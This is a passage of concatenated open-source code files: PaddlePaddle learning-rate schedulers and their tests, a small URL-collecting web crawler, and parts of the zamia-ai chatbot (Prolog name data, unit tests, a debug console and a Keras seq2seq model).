decayed_lr = learning_rate * (decay_rate**div_res)
return decayed_lr
def natural_exp_decay(learning_rate, decay_steps, decay_rate, staircase=False):
"""Applies natural exponential decay to the initial learning rate.
When training a model, it is often recommended to lower the learning rate as the
training progresses. By using this function, the learning rate will be decayed by
natural exponential power 'decay_rate' every 'decay_steps' steps.
Decayed learning rate calculates as follows:
>>> if not staircase:
>>> decayed_learning_rate = learning_rate * exp(- decay_rate * (global_step / decay_steps))
>>> else:
>>> decayed_learning_rate = learning_rate * exp(- decay_rate * floor(global_step / decay_steps))
Args:
learning_rate(Variable|float): The initial learning rate. It should be a Variable
or a float
decay_steps(int): The learning rate decay steps. See the decay computation above.
decay_rate(float): The learning rate decay rate. See the decay computation above.
staircase(bool): If True, decay the learning rate at discrete intervals, which
means the learning rate will be decayed by natural exponential power
`decay_rate` every `decay_steps`. If False, the learning rate will be
decayed continuously, following the formula above. Default: False
Returns:
The decayed learning rate. The data type is float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
base_lr = 0.1
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.layers.natural_exp_decay(
learning_rate=base_lr,
decay_steps=10000,
decay_rate=0.5,
staircase=True))
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.NaturalExpDecay(learning_rate, decay_steps,
decay_rate, staircase)
return decay
else:
global_step = _decay_step_counter()
div_res = global_step / decay_steps
if staircase:
div_res = ops.floor(div_res)
decayed_lr = learning_rate * ops.exp(-1 * decay_rate * div_res)
return decayed_lr
def inverse_time_decay(learning_rate, decay_steps, decay_rate, staircase=False):
"""
Applies inverse time decay to the initial learning rate.
When training a model, it is often recommended to lower the learning rate as the
training progresses. By using this function, an inverse decay function will be
applied to the initial learning rate.
Decayed learning rate calculates as follows:
>>> if staircase == True:
>>> decayed_learning_rate = learning_rate / (1 + decay_rate * floor(global_step / decay_step))
>>> else:
>>> decayed_learning_rate = learning_rate / (1 + decay_rate * global_step / decay_step)
Args:
learning_rate(Variable|float): The initial learning rate. It should be a Variable
or a float
decay_steps(int): The learning rate decay steps. See the decay computation above.
decay_rate(float): The learning rate decay rate. See the decay computation above.
staircase(bool): If True, decay the learning rate at discrete intervals, which
means the learning rate will be decayed by `decay_rate` times
every `decay_steps`. If False, the learning rate will be decayed
continuously, following the formula above. Default: False
Returns:
Variable: The decayed learning rate. The data type is float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
base_lr = 0.1
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.layers.inverse_time_decay(
learning_rate=base_lr,
decay_steps=10000,
decay_rate=0.5,
staircase=True))
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.InverseTimeDecay(learning_rate, decay_steps,
decay_rate, staircase)
return decay
else:
global_step = _decay_step_counter()
div_res = global_step / decay_steps
if staircase:
div_res = ops.floor(div_res)
decayed_lr = learning_rate / (1 + decay_rate * div_res)
return decayed_lr
def polynomial_decay(learning_rate,
decay_steps,
end_learning_rate=0.0001,
power=1.0,
cycle=False):
"""
Applies polynomial decay to the initial learning rate.
.. code-block:: text
if cycle:
decay_steps = decay_steps * ceil(global_step / decay_steps)
else:
global_step = min(global_step, decay_steps)
decayed_learning_rate = (learning_rate - end_learning_rate) *
(1 - global_step / decay_steps) ^ power + end_learning_rate
Args:
learning_rate(Variable|float32): A scalar float32 value or a Variable. This
will be the initial learning rate during training.
decay_steps(int32): A Python `int32` number.
end_learning_rate(float): A Python `float` number.
power(float): A Python `float` number.
cycle(bool): If set true, decay the learning rate every decay_steps.
Returns:
Variable: The decayed learning rate
Examples:
.. code-block:: python
import paddle.fluid as fluid
start_lr = 0.01
total_step = 5000
end_lr = 0
lr = fluid.layers.polynomial_decay(
start_lr, total_step, end_lr, power=1)
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.PolynomialDecay(learning_rate, decay_steps,
end_learning_rate, power, cycle)
return decay
else:
global_step = _decay_step_counter()
if cycle:
div_res = ops.ceil(global_step / decay_steps)
zero_var = tensor.fill_constant(
shape=[1], dtype='float32', value=0.0)
one_var = tensor.fill_constant(
shape=[1], dtype='float32', value=1.0)
with control_flow.Switch() as switch:
with switch.case(global_step == zero_var):
tensor.assign(input=one_var, output=div_res)
decay_steps = decay_steps * div_res
else:
decay_steps_var = tensor.fill_constant(
shape=[1], dtype='float32', value=float(decay_steps))
global_step = nn.elementwise_min(
x=global_step, y=decay_steps_var)
decayed_lr = (learning_rate - end_learning_rate) * \
((1 - global_step / decay_steps) ** power) + end_learning_rate
return decayed_lr
def piecewise_decay(boundaries, values):
"""Applies piecewise decay to the initial learning rate.
The algorithm can be described as the code below.
.. code-block:: text
boundaries = [10000, 20000]
values = [1.0, 0.5, 0.1]
if step < 10000:
learning_rate = 1.0
elif 10000 <= step < 20000:
learning_rate = 0.5
else:
learning_rate = 0.1
Args:
boundaries: A list of step numbers.
values: A list of learning rate values that will be picked during
different step boundaries.
Returns:
The decayed learning rate.
Examples:
.. code-block:: python
import paddle.fluid as fluid
boundaries = [10000, 20000]
values = [1.0, 0.5, 0.1]
optimizer = fluid.optimizer.Momentum(
momentum=0.9,
learning_rate=fluid.layers.piecewise_decay(boundaries=boundaries, values=values),
regularization=fluid.regularizer.L2Decay(1e-4))
"""
with default_main_program()._lr_schedule_guard():
if len(values) - len(boundaries) != 1:
raise ValueError("len(values) - len(boundaries) should be 1")
if in_dygraph_mode():
decay = imperate_lr.PiecewiseDecay(boundaries, values, 0)
return decay
else:
global_step = _decay_step_counter()
lr = tensor.create_global_var(
shape=[1],
value=0.0,
dtype='float32',
persistable=True,
name="learning_rate")
with control_flow.Switch() as switch:
for i in range(len(boundaries)):
boundary_val = tensor.fill_constant(
shape=[1],
dtype='float32',
value=float(boundaries[i]),
force_cpu=True)
value_var = tensor.fill_constant(
shape=[1], dtype='float32', value=float(values[i]))
with switch.case(global_step < boundary_val):
tensor.assign(value_var, lr)
last_value_var = tensor.fill_constant(
shape=[1],
dtype='float32',
value=float(values[len(values) - 1]))
with switch.default():
tensor.assign(last_value_var, lr)
return lr
def cosine_decay(learning_rate, step_each_epoch, epochs):
"""
Applies cosine decay to the learning rate.
When training a model, it is often recommended to lower the learning rate as the
training progresses. By using this function, the learning rate will be decayed by
following cosine decay strategy.
.. math::
decayed\_lr = learning\_rate * 0.5 * (\\cos(epoch * \\frac{\\pi}{epochs}) + 1)
Args:
learning_rate(Variable|float): The initial learning rate.
step_each_epoch(int): the number of steps in an epoch.
epochs(int): the number of epochs.
Returns:
Variable: The decayed learning rate.
Examples:
.. code-block:: python
import paddle.fluid as fluid
base_lr = 0.1
lr = fluid.layers.cosine_decay(
learning_rate = base_lr, step_each_epoch=10000, epochs=120)
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.CosineDecay(learning_rate, step_each_epoch,
epochs)
return decay
else:
global_step = _decay_step_counter()
cur_epoch = ops.floor(global_step / step_each_epoch)
decayed_lr = learning_rate * 0.5 * (
ops.cos(cur_epoch * math.pi / epochs) + 1)
return decayed_lr
def linear_lr_warmup(learning_rate, warmup_steps, start_lr, end_lr):
"""
This operator uses the linear learning rate warm-up strategy to adjust the learning rate preliminarily before the normal learning rate scheduling.
For more information, please refer to `Bag of Tricks for Image Classification with Convolutional Neural Networks <https://arxiv.org/abs/1812.01187>`_
When global_step < warmup_steps, learning rate is updated as:
.. code-block:: text
linear_step = end_lr - start_lr
lr = start_lr + linear_step * (global_step / warmup_steps)
where start_lr is the initial learning rate, and end_lr is the final learning rate;
When global_step >= warmup_steps, learning rate is updated as:
.. code-block:: text
lr = learning_rate
where lr is the learning_rate after warm-up.
Args:
learning_rate (Variable|float): Learning_rate after warm-up, it could be 1D-Tensor or single value with the data type of float32.
warmup_steps (int): Steps for warm up.
start_lr (float): Initial learning rate of warm up.
end_lr (float): Final learning rate of warm up.
Returns:
Variable: Warm-up learning rate with the same data type as learning_rate.
Examples:
.. code-block:: python
import paddle.fluid as fluid
boundaries = [100, 200]
lr_steps = [0.1, 0.01, 0.001]
learning_rate = fluid.layers.piecewise_decay(boundaries, lr_steps) #case1, 1D-Tensor
#learning_rate = 0.1 #case2, single-value
warmup_steps = 50
start_lr = 1. / 3.
end_lr = 0.1
decayed_lr = fluid.layers.linear_lr_warmup(learning_rate,
warmup_steps, start_lr, end_lr)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
out, = exe.run(fetch_list=[decayed_lr.name])
print(out)
# case1: [0.33333334]
# case2: [0.33333334]
"""
dtype = 'float32'
if isinstance(learning_rate, Variable):
dtype = learning_rate.dtype
linear_step = float(end_lr) - float(start_lr)
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
lr = imperate_lr.LinearLrWarmup(learning_rate, warmup_steps,
start_lr, end_lr)
return lr
else:
lr = tensor.create_global_var(
shape=[1],
value=0.0,
dtype=dtype,
persistable=True,
name="learning_rate_warmup")
global_step = _decay_step_counter()
with control_flow.Switch() as switch:
with switch.case(global_step < warmup_steps):
decayed_lr = start_lr + linear_step * (global_step /
float(warmup_steps))
tensor.assign(decayed_lr, lr)
with switch.default():
if not isinstance(learning_rate, Variable):
learning_rate = tensor.fill_constant(
shape=[1], dtype=dtype, value=float(learning_rate))
tensor.assign(learning_rate, lr)
return lr
```
#### File: tests/unittests/test_fill_any_like_op.py
```python
from __future__ import print_function
import paddle
import paddle.fluid as fluid
import paddle.fluid.core as core
import paddle.compat as cpt
import unittest
import numpy as np
from op_test import OpTest
class TestFillAnyLikeOp(OpTest):
def setUp(self):
self.op_type = "fill_any_like"
self.dtype = np.int32
self.value = 0.0
self.init()
self.inputs = {'X': np.random.random((219, 232)).astype(self.dtype)}
self.attrs = {'value': self.value}
self.outputs = {'Out': self.value * np.ones_like(self.inputs["X"])}
def init(self):
pass
def test_check_output(self):
self.check_output()
class TestFillAnyLikeOpFloat32(TestFillAnyLikeOp):
def init(self):
self.dtype = np.float32
self.value = 0.0
class TestFillAnyLikeOpValue1(TestFillAnyLikeOp):
def init(self):
self.value = 1.0
class TestFillAnyLikeOpValue2(TestFillAnyLikeOp):
def init(self):
self.value = 1e-10
class TestFillAnyLikeOpValue3(TestFillAnyLikeOp):
def init(self):
self.value = 1e-100
class TestFillAnyLikeOpType(TestFillAnyLikeOp):
def setUp(self):
self.op_type = "fill_any_like"
self.dtype = np.int32
self.value = 0.0
self.init()
self.inputs = {'X': np.random.random((219, 232)).astype(self.dtype)}
self.attrs = {
'value': self.value,
'dtype': int(core.VarDesc.VarType.FP32)
}
self.outputs = {
'Out':
self.value * np.ones_like(self.inputs["X"]).astype(np.float32)
}
class TestFillAnyLikeOpOverflow(TestFillAnyLikeOp):
def init(self):
self.value = 1e100
def test_check_output(self):
exception = None
try:
self.check_output(check_dygraph=False)
except core.EnforceNotMet as ex:
exception = ex
self.assertIsNotNone(exception)
class TestFillAnyLikeOpFloat16(TestFillAnyLikeOp):
def init(self):
self.dtype = np.float16
class ApiOnesLikeTest(unittest.TestCase):
def test_out(self):
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
ones = paddle.ones_like(data, device="cpu")
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[ones])
expected_result = np.ones(10, dtype="float64")
self.assertEqual((result == expected_result).all(), True)
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
ones = paddle.ones_like(data, device="cpu", dtype="float32")
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[ones])
expected_result = np.ones(10, dtype="float32")
self.assertEqual((result == expected_result).all(), True)
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
ones = paddle.ones_like(data)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[ones])
expected_result = np.ones(10, dtype="float32")
self.assertEqual((result == expected_result).all(), True)
class ApiZerosLikeTest(unittest.TestCase):
def test_out(self):
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
zeros = paddle.zeros_like(data, device="cpu")
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[zeros])
expected_result = np.zeros(10, dtype="float64")
self.assertEqual((result == expected_result).all(), True)
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
zeros = paddle.zeros_like(data, device="cpu", dtype="float32")
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[zeros])
expected_result = np.zeros(10, dtype="float32")
self.assertEqual((result == expected_result).all(), True)
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
zeros = paddle.zeros_like(data)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[zeros])
expected_result = np.zeros(10, dtype="float32")
self.assertEqual((result == expected_result).all(), True)
class TestOnesZerosError(unittest.TestCase):
def test_errors(self):
def test_device_error1():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data = fluid.data(name="data", shape=[10], dtype="float32")
paddle.ones_like(data, device="opu")
self.assertRaises(ValueError, test_device_error1)
def test_device_error2():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data = fluid.data(name="data", shape=[10], dtype="float32")
paddle.ones_like(data, dtype="float")
self.assertRaises(ValueError, test_device_error2)
def test_device_error3():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data = fluid.data(name="data", shape=[10], dtype="float32")
paddle.zeros_like(data, device="opu")
self.assertRaises(ValueError, test_device_error3)
def test_device_error4():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data = fluid.data(name="data", shape=[10], dtype="float32")
paddle.zeros_like(data, dtype="float")
self.assertRaises(ValueError, test_device_error4)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "0-Yuuki-0/MA1508",
"score": 3
} |
#### File: 0-Yuuki-0/MA1508/Web Crawler.py
```python
import requests
import re
websites = []
tmp = []
def dfs(content):
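# the lookbehind/lookahead pairs capture just the quoted href value, e.g.
# '<a href="https://example.com">' yields 'https://example.com'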
pattern = re.compile(r'(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')')
results = pattern.findall(content.decode('ISO-8859-1'))
for result in results:
tmp.append(result)
def get_url(url):
if url in websites:
return
try:
# a 5-second timeout is assumed here, matching the value echoed in the except branch
r = requests.get(url, timeout=5)
print(r.url)
except Exception:
print('timeout', 5)
return
else:
text = r.content
dfs(text)
websites.append(url)
if __name__ == '__main__':
init = 'https://www.mathworks.com'
tmp.append(init)
while len(websites) < 100 and len(tmp) >= 1:
print(str((len(websites) + 1))+"/100")
tmp_url = tmp[0]
del tmp[0]
get_url(tmp_url)
print("Finish")
file = open('urls'+'.txt', 'w+')
for url in websites:
file.write(url + '\n')
file.close()
``` |
{
"source": "0zAND1z/zamia-ai",
"score": 3
} |
#### File: data-tools/names/names_aip.py
```python
import codecs
from nltools import misc
misc.init_app ('names_aip')
def name2pred(name):
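# strip non-alphabetic characters and prefix 'name' to form a Prolog-safe
# predicate, e.g. name2pred(u'Anna-Lena') -> 'nameAnnaLena'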
res = u''
for c in name:
if c.isalpha():
res += c
return 'name' + res
for gender in ['Female', 'Male']:
with codecs.open('%s20.txt' % gender, 'r', 'utf8') as f:
for line in f:
name = line.strip()
print u'rdfsLabel(%s, de, "%s").' % (name2pred(name), name)
print u'rdfsLabel(%s, en, "%s").' % (name2pred(name), name)
print u'wdpdSexOrGender(%s, wde%s).' % (name2pred(name), gender)
print u'wdpdInstanceOf(%s, wde%sGivenName).' % (name2pred(name), gender)
print
```
#### File: zamia-ai/tests/test_aiprolog.py
```python
import unittest
import logging
import codecs
from nltools import misc
from sqlalchemy.orm import sessionmaker
from zamiaai import model
from zamiaprolog.logicdb import LogicDB
from aiprolog.runtime import AIPrologRuntime
from aiprolog.parser import AIPrologParser
UNITTEST_MODULE = 'unittests'
UNITTEST_CONTEXT = 'unittests'
class TestAIProlog (unittest.TestCase):
def setUp(self):
config = misc.load_config('.airc')
#
# logic DB
#
self.db = LogicDB(model.url)
#
# aiprolog environment setup
#
self.prolog_rt = AIPrologRuntime(self.db)
self.parser = AIPrologParser(self.db)
self.prolog_rt.set_trace(True)
self.db.clear_module(UNITTEST_MODULE)
# @unittest.skip("temporarily disabled")
def test_tokenize(self):
clause = self.parser.parse_line_clause_body("tokenize (de, 'hallo, welt!', X)")
logging.debug('clause: %s' % clause)
solutions = self.prolog_rt.search(clause)
logging.debug('solutions: %s' % repr(solutions))
self.assertEqual (len(solutions), 1)
self.assertEqual (len(solutions[0]['X'].l), 2)
# @unittest.skip("temporarily disabled")
def test_edit_distance(self):
clause = self.parser.parse_line_clause_body("edit_distance (['hallo', 'welt'], ['hallo', 'springfield'], X)")
logging.debug('clause: %s' % clause)
solutions = self.prolog_rt.search(clause)
logging.debug('solutions: %s' % repr(solutions))
self.assertEqual (len(solutions), 1)
self.assertEqual (solutions[0]['X'].f, 1.0)
# class TestMacroEngine (unittest.TestCase):
#
# def setUp(self):
# Session = sessionmaker(bind=model.engine)
# self.session = Session()
#
# def testLocalMacros(self):
#
# me = NLPMacroEngine(self.session)
# discourses = me.macro_expand('de', u'(HAL,|Computer,|Du,|) (Ich bin|Ich fühle mich|Man bin ich|Da bin ich) (zufrieden|so zufrieden|glücklich|so glücklich|froh|so froh)', u'', None)
#
# self.assertEqual(len(discourses), 96)
#
# def testMacroTokens(self):
#
# me = NLPMacroEngine(self.session)
# discourses = me.macro_expand('de', u'hallo (HAL|Computer|Du|lieber computer|) wie geht es dir (heute|)',
# u'foo @MACRO_0:TSTART_W_0 bar @MACRO_0:TEND_W_0 @MACRO_0:W baz @MACRO_1:TEND_W_0?', None)
#
# self.assertEqual(len(discourses), 10)
# self.assertEqual(discourses[0][1], u'foo 1 bar 2 HAL baz 7?')
#
# discourses = me.macro_expand('de', u'foobar what is the full name of (foo|donald trump)',
# u'foo @MACRO_0:TSTART_W_0 bar @MACRO_0:TEND_W_0', None)
#
# self.assertEqual(len(discourses), 2)
# self.assertEqual(discourses[0][1], u'foo 7 bar 8')
# self.assertEqual(discourses[1][1], u'foo 7 bar 9')
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('sqlalchemy.engine').setLevel(logging.WARNING)
unittest.main()
```
#### File: zamia-ai/zamiaai/ai_dbg.py
```python
from __future__ import print_function
import os
import sys
import logging
class AIDbg(object):
def __init__(self, kernal, user_uri, realm, verbose):
self.kernal = kernal
self.user_uri = user_uri
self.realm = realm
self.verbose = verbose
if self.verbose:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
def print_help(self):
print (":h help")
print (":c <skills> compile <skills>")
print (":m show memory / context")
print (":t %s prolog tracing" % ('disable' if self.run_trace else 'enable'))
print (":v verbose logging %s" % ('off' if self.verbose else 'on'))
print (":q quit")
def process_command(self, line):
if line == ":h":
self.print_help()
# FIXME: we'd have to force-reload the python module
elif line[:2] == ":c":
parts = line.split(' ')
if len(parts) < 2:
logging.error('?usage')
self.print_help()
return
self.kernal.compile_skill_multi (parts[1:])
elif line == ":m":
print ("ctx.user = %s" % self.ctx.user)
print ("ctx.realm = %s" % self.ctx.realm)
print ("ctx.lang = %s" % self.ctx.lang)
memd = self.kernal.mem_dump(self.ctx.realm)
for k, v, score in memd:
print(u'MEM(%-8s): %-20s: %s (%f)' % (self.ctx.realm, k, v, score))
memd = self.kernal.mem_dump(self.ctx.user)
for k, v, score in memd:
print(u'MEM(%-8s): %-20s: %s (%f)' % (self.ctx.user, k, v, score))
elif line == ":t":
self.run_trace = not self.run_trace
elif line == ":v":
self.verbose = not self.verbose
if self.verbose:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
else:
logging.error("? command error ('%s')" % line)
self.print_help()
def run(self):
self.ctx = self.kernal.create_context(user=self.user_uri, realm=self.realm)
self.run_trace = False
while True:
line = raw_input ('dbg (:h for help)> ')
if not line:
continue
if len(line)<1:
continue
if line == ':q':
break
if line[0] == ':':
self.process_command(line)
continue
out, score, action = self.kernal.process_input(self.ctx, line, run_trace=self.run_trace)
if action:
logging.info(u'RESP: [%6.1f] %s | action: %s' % (score, out, unicode(action)))
else:
logging.info(u'RESP: [%6.1f] %s ' % (score, out))
```
#### File: zamia-ai/zamiaai/nlp_model.py
```python
from __future__ import print_function
import os
import sys
import logging
import codecs
import math
import json
import shutil
import numpy as np
import tensorflow as tf
from tensorflow import keras
from time import time
from random import randint, random
from copy import deepcopy
import model
from nltools.tokenizer import tokenize
from nltools.misc import mkdirs
# extra decoder symbols
_START = '_START'
_STOP = '_STOP'
_OR = '__OR__'
START_ID = 0
STOP_ID = 1
OR_ID = 2
DEBUG_LIMIT = 0
# DEBUG_LIMIT = 1000
class NLPModel(object):
def __init__(self, lang, session, model_args ):
self.model_dir = model_args['model_dir']
self.lang = lang
self.session = session
self.max_inp_len = model_args['max_input_len']
self.lstm_latent_dim = model_args['lstm_latent_dim']
self.batch_size = model_args['batch_size']
# if global_step>0:
# self.model_fn = '%s/latest.ckpt-%d' % (self.model_dir, global_step)
# else:
# self.model_fn = '%s/latest.ckpt' % (self.model_dir)
self.weights_fn = '%s/weights.h5' % (self.model_dir)
# self.in_dict_fn = '%s/in_dict.csv' % (self.model_dir)
self.decoder_dict_fn = '%s/decoder_dict.csv' % (self.model_dir)
def _compute_2d_diagram(self):
dia = []
longest_inp = []
longest_resp = []
for inp, resp in self.training_data:
inp_len = len(inp)
resp_len = len(resp) + 1 # +1 because EOS_ID gets appended later
while len(dia)<=inp_len:
dia.append([])
while len(dia[inp_len])<=resp_len:
dia[inp_len].append(0)
dia[inp_len][resp_len] += 1
# if inp_len == 8 and 'tallinn' in inp:
# print "2d diagram: %d -> %d %s %s" % (inp_len, resp_len, inp, resp)
if not longest_inp or (inp_len > len(longest_inp[0])):
longest_inp = (deepcopy(inp), deepcopy(resp))
if not longest_resp or (resp_len > len(longest_resp[1])):
longest_resp = (deepcopy(inp), deepcopy(resp))
logging.info('longest input: %s' % repr(longest_inp[0]))
logging.info(' %s' % repr(longest_inp[1]))
logging.info('longest resp : %s' % repr(longest_resp[0]))
logging.info(' %s' % repr(longest_resp[1]))
return dia
def _compute_decoder_dict(self):
self.decoder_dict = {_START : START_ID, _STOP : STOP_ID, _OR : OR_ID}
self.num_segments = 0
for inp, resp in self.training_data:
for pred in resp:
if not pred in self.decoder_dict:
self.decoder_dict[pred] = len(self.decoder_dict)
self.num_segments += 1
logging.info ('decoder dict done: %d entries. num_segments: %d.' %
(len(self.decoder_dict), self.num_segments))
self.reverse_decoder_dict = dict( (i, token) for token, i in self.decoder_dict.items() )
def _save_decoder_dict(self):
with codecs.open(self.decoder_dict_fn, 'w', 'utf8') as f:
f.write("%d\n" % self.max_resp_len)
for k in sorted(self.decoder_dict):
f.write(u"%d;%s\n" % (self.decoder_dict[k], k))
logging.info ('%s written.', self.decoder_dict_fn)
def _load_decoder_dict(self):
with codecs.open(self.decoder_dict_fn, 'r', 'utf8') as f:
self.max_resp_len = int(f.readline().rstrip())
self.decoder_dict = {}
while True:
line = f.readline()
if not line:
break
line = line.lstrip().rstrip()
parts = line.split(';')
self.decoder_dict[parts[1]] = int(parts[0])
logging.info ('%s read, %d entries, max_resp_len=%d.' % (self.decoder_dict_fn, len(self.decoder_dict), self.max_resp_len))
self.reverse_decoder_dict = dict( (i, token) for token, i in self.decoder_dict.items() )
def _load_word_embeddings(self):
embdfn = '%s/word_embeddings.vec' % self.model_dir
logging.info('loading word embeddings from %s ...' % embdfn)
self.embedding_dict = {}
self.embed_dim = 0
with codecs.open(embdfn, encoding='utf-8') as embdf:
first_line = True
for line in embdf:
if first_line:
first_line = False
continue
values = line.rstrip().rsplit(' ')
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
self.embedding_dict[word] = coefs
if not self.embed_dim:
self.embed_dim = coefs.shape[0]
nb_words = len(self.embedding_dict)
logging.info('found %s word vectors of dimension %d.' % (nb_words, self.embed_dim))
def restore(self):
self._load_word_embeddings()
self._load_decoder_dict()
self._create_keras_model()
self.keras_model_train.load_weights(self.weights_fn)
def predict (self, inp):
td_inp = tokenize(inp, lang=self.lang)
num_decoder_tokens = len (self.decoder_dict)
encoder_input_data = np.zeros( (1, self.max_inp_len, self.embed_dim), dtype='float32')
for j, token in enumerate(td_inp):
if unicode(token) in self.embedding_dict:
encoder_input_data[0, j] = self.embedding_dict[unicode(token)]
logging.debug('encoder_input_data[0]: %s' % str(encoder_input_data[0]))
# import pdb; pdb.set_trace()
# Encode the input as state vectors.
states_value = self.keras_model_encoder.predict(encoder_input_data)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1, 1, num_decoder_tokens))
# Populate the first token of target sequence with the start token.
target_seq[0, 0, self.decoder_dict[_START]] = 1.
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sequence = []
while not stop_condition:
output_tokens, h, c = self.keras_model_decoder.predict([target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
sampled_token = self.reverse_decoder_dict[sampled_token_index]
decoded_sequence.append(sampled_token)
logging.debug('sampled_token_index=%d, sampled_token=%s' % (sampled_token_index, sampled_token))
# Exit condition: either hit max length
# or find stop token.
if (sampled_token == _STOP or len(decoded_sequence) > self.max_resp_len):
stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1, 1, num_decoder_tokens))
target_seq[0, 0, sampled_token_index] = 1.
# Update states
states_value = [h, c]
return decoded_sequence
def _ascii_art(self, n):
if n == 0:
return ' '
if n < 10:
return '.'
if n < 100:
return ';'
if n < 1000:
return 'o'
if n < 10000:
return '*'
return 'X'
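# e.g. _ascii_art(7) -> '.', _ascii_art(250) -> 'o'; used by train() below to
# render the training-data length distribution as a density map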
def _create_keras_model(self):
# for an explanation on how this works, see:
# https://blog.keras.io/a-ten-minute-introduction-to-sequence-to-sequence-learning-in-keras.html
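# In short: the encoder LSTM compresses the input sequence into its final
# (h, c) state, which seeds the decoder LSTM that then emits one response
# token per step.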
num_encoder_tokens = self.embed_dim
num_decoder_tokens = len (self.decoder_dict)
# Define an input sequence and process it.
encoder_inputs = keras.layers.Input(shape=(None, num_encoder_tokens))
encoder = keras.layers.LSTM(self.lstm_latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
# We discard `encoder_outputs` and only keep the states.
encoder_states = [state_h, state_c]
# Set up the decoder, using `encoder_states` as initial state.
decoder_inputs = keras.layers.Input(shape=(None, num_decoder_tokens))
# We set up our decoder to return full output sequences,
# and to return internal states as well. We don't use the
# return states in the training model, but we will use them in inference.
decoder_lstm = keras.layers.LSTM(self.lstm_latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs,
initial_state=encoder_states)
decoder_dense = keras.layers.Dense(num_decoder_tokens, activation='softmax')
decoder_outputs = decoder_dense(decoder_outputs)
# training
# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`
self.keras_model_train = keras.Model([encoder_inputs, decoder_inputs], decoder_outputs)
self.keras_model_train.compile(optimizer='rmsprop', loss='categorical_crossentropy')
self.keras_model_train.summary()
# inference
self.keras_model_encoder = keras.Model(encoder_inputs, encoder_states)
decoder_state_input_h = keras.layers.Input(shape=(self.lstm_latent_dim,))
decoder_state_input_c = keras.layers.Input(shape=(self.lstm_latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
self.keras_model_decoder = keras.Model( [decoder_inputs] + decoder_states_inputs,
[decoder_outputs] + decoder_states)
def train(self, num_epochs, incremental):
# load discourses from db, resolve non-unique inputs (implicit or of responses)
logging.info('load discourses from db...')
drs = {}
for dr in self.session.query(model.TrainingData).filter(model.TrainingData.lang==self.lang):
if not dr.inp in drs:
drs[dr.inp] = set()
resp = [dr.md5s]
args = json.loads(dr.args)
if args:
for arg in args:
resp.append(json.dumps(arg))
drs[dr.inp].add(tuple(resp))
if DEBUG_LIMIT>0 and len(drs)>=DEBUG_LIMIT:
logging.warn(' stopped loading discourses because DEBUG_LIMIT of %d was reached.' % DEBUG_LIMIT)
break
# parse json, add start/stop tokens, implicit or responses:
self.training_data = []
self.max_resp_len = 0
for inp in drs:
td_inp = tokenize(inp, lang=self.lang)
l = len(td_inp)
if l > self.max_inp_len:
raise Exception ('input too long: %s' % repr(td_inp))
# self.max_inp_len = l
td_resp = [_START]
for resp in drs[inp]:
if len(td_resp)>1:
td_resp.append(_OR)
td_resp.extend(resp)
td_resp.append(_STOP)
l = len(td_resp)
if l > self.max_resp_len:
self.max_resp_len = l
# print ("training data: %s -> %s" % (repr(td_inp), repr(td_resp)))
self.training_data.append((td_inp, td_resp))
#
# set up model dir
#
if not incremental:
mkdirs(self.model_dir)
#
# 2D diagram of available data
#
dia = self._compute_2d_diagram()
print (" n i o 01020304050607080910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455")
for inp_len in range(len(dia)):
s = 0
l = ''
cnt = 0
for n in dia[inp_len]:
if cnt<56:
l += ' ' + self._ascii_art(n)
s += n
cnt += 1
print ('%6d %2d %2d %s' % (s, inp_len+1, self.max_resp_len, l))
#
